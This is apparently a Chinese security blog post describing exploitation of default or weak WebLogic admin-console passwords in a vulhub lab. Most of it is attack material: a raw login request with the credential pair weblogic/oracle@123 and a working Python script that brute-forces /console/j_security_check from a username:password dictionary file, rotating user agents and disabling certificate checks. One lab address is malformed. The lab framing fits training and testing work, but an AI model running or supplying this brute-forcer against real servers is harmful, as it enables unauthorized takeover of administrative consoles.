漏洞利用-Weblogic 弱口令 - HolaSecurity

漏洞利用-Weblogic 弱口令

2024-3-08 18:36

|

261

|

0

|

|

2024-3-08 18:36

|

hola

190 字

|

5 分钟

本文最后更新于 420 天前，其中的信息可能已经有所发展或是发生改变。

:::info
💘渗透全流程：
信息收集 – 漏洞发现 – 漏洞👣利用 – 权限提升 – 隧道搭建 – 内网渗透 – 横向移动 – 后渗透
:::

Weblogic 漏洞

📚测试环境

vulhub 靶场 weblogic weak_password 环境。

使用 docker-compose 开启环境

访问测试（参考：https://www.yuque.com/u2164633/eww48f/rhgirguw8myq83n5）
http://192.168.128.225.135:7001/console/login/LoginForm.jsp

📚漏洞原理

📚POC 示例

POST /console/j_security_check HTTP/1.1
Host: 192.168.225.135:7001
Content-Length: 66
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.225.135:7001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.225.135:7001/console/login/LoginForm.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=KyBwlkxSsYHhGGrt1KJbq4vjzz51fF3XYf7427mRSxM2Jh1pg1zt!1701480759
Connection: close

j_username=weblogic&j_password=oracle@123&j_character_encoding=UTF-8

漏洞利用

V1.0

#! /usr/bin/env python

"""
Weblogic 弱口令

url: /console/j_security_check

post body： j_username=weblogic&j_password=xxx&j_character_encoding=UTF-8

response:
成功： 302 重定向到 It's now at <a href="http://192.168.225.135:7001/console/login/LoginForm.jsp"</a>
失败： 302 重定向到 It's now at <a href="http://192.168.225.135:7001/console"</a>

"""

import requests
from urllib.parse import urljoin
from fake_useragent import UserAgent
import datetime
from rich import print as rprint

ua = UserAgent()

def get_time():
    return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")

def weblogic_weak_pwd(base_url):
    with open('updict.txt', 'r') as f:
        for line in f.readlines():
            line = line.replace('\n', '')
            username = line.split(':')[0]
            password = line.split(':')[1]

            headers = {
                'User-Agent': ua.random
            }
            data = {
                "j_username": username,
                "j_password": password,
                "j_character_encoding": 'UTF-8'
            }

            # url = '/console/login/LoginForm.jsp'
            check_url = '/console/j_security_check'
            check_url = urljoin(base_url, check_url)
            response = requests.post(check_url, headers=headers, data=data, allow_redirects=False, verify=False)
            if response.status_code == 302 and '/console' in response.text and 'LoginForm.jsp' not in response.text:
                rprint(
                    "[[bold green]" + get_time() + "[/bold green]] [[bold green]Success[/bold green]] > [bold yellow]" + f" Weblogic 登录成功，用户名：{username}， 密码：{password} " + "[/bold yellow]")
                break
            else:
                rprint(
                    "[[bold green]" + get_time() + "[/bold green]] [[bold red]Faild[/bold red]] > [bold yellow]" + " Weblogic Not Found Or No Authorized " + "[/bold yellow]")

if __name__ == '__main__':
    base_url = "http://192.168.225.135:7001"
    weblogic_weak_pwd(base_url)

学海无涯，回头是岸。 --- hola

python 武器库

暂无评论

发送评论编辑评论

Markdown

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!